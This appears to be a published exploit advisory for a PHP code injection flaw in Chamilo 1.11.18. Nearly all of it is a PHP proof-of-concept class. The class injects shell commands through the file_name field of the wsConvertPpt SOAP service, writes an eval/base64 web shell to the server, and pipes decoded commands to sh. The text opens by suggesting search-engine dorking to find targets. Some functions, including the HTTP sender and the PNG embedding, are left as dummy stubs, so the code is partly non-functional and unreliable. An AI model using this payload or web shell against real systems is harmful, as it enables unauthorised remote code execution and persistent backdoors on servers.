Headline
Chamilo 1.11.18 Code Injection
Chamilo version 1.11.18 suffers from a PHP code injection vulnerability.
=============================================================================================================================================| # Title : Chamilo 1.11.18 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 123 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass ChamiloExploit { private $targetUri; private $webshellName; private $postParam; public function __construct($targetUri, $webshell = null) { $this->targetUri = rtrim($targetUri, '/'); $this->webshellName = $webshell ?: $this->generateRandomWebshellName(); } private function generateRandomWebshellName() { return bin2hex(random_bytes(8)) . '.php'; } private function soapRequest($cmd) { $pptSize = rand(720, 1440) . 'x' . rand(360, 720); return <<<EOS<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{$this->targetUri}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <ns1:wsConvertPpt> <param0 xsi:type="ns2:Map"> <item> <key xsi:type="xsd:string">file_data</key> <value xsi:type="xsd:string"></value> </item> <item> <key xsi:type="xsd:string">file_name</key> <value xsi:type="xsd:string">`{{}}`.pptx'|" |{$cmd}||a #</value> </item> <item> <key xsi:type="xsd:string">service_ppt2lp_size</key> <value xsi:type="xsd:string">{$pptSize}</value> </item> </param0> </ns1:wsConvertPpt> </SOAP-ENV:Body></SOAP-ENV:Envelope>EOS; } public function uploadWebshell() { $this->postParam = bin2hex(random_bytes(4)); $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>"; $pngWebshell = $this->injectPhpPayloadPng($phpPayload); if ($pngWebshell === null) { return null; } $payload = base64_encode($pngWebshell); $cmd = "echo {$payload}|openssl enc -a -d > ./{$this->webshellName}"; $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd)); return $response; } private function injectPhpPayloadPng($phpPayload) { // Implement your logic to inject PHP payload into a PNG image // For demonstration purposes, we'll return a dummy PNG data return pack('H*', '89504E470D0A1A0A...'); // Example PNG header } public function executePhp($cmd) { $payload = base64_encode($cmd); $response = $this->sendRequest('POST', "/main/inc/lib/ppt2png/{$this->webshellName}", "application/x-www-form-urlencoded", [$this->postParam => $payload]); return $response; } public function executeCommand($cmd) { $payload = base64_encode($cmd); $cmd = "echo {$payload}|openssl enc -a -d|sh"; $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd)); return $response; } public function check() { $marker = bin2hex(random_bytes(4)); $res = $this->executeCommand("echo {$marker}"); if ($res && strpos($res, 'wsConvertPptResponse') !== false && strpos($res, $marker) !== false) { return 'Vulnerable'; } else { return 'Safe'; } } public function exploit($payload) { switch ($payload['type']) { case 'php': $res = $this->uploadWebshell(); if (!$res || strpos($res, 'wsConvertPptResponse') === false) { throw new Exception('Web shell upload error.'); } $this->executePhp($payload['encoded']); break; case 'unix_cmd': $this->executeCommand($payload['encoded']); break; case 'linux_dropper': // Implement Linux dropper logic break; } } private function sendRequest($method, $uri, $ctype, $data) { // Implement your HTTP request logic here (using cURL or similar) // For demonstration purposes, return a dummy response return 'Dummy response'; }}// Usage$exploit = new ChamiloExploit('http://target.com', 'webshell.php');$exploit->check();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================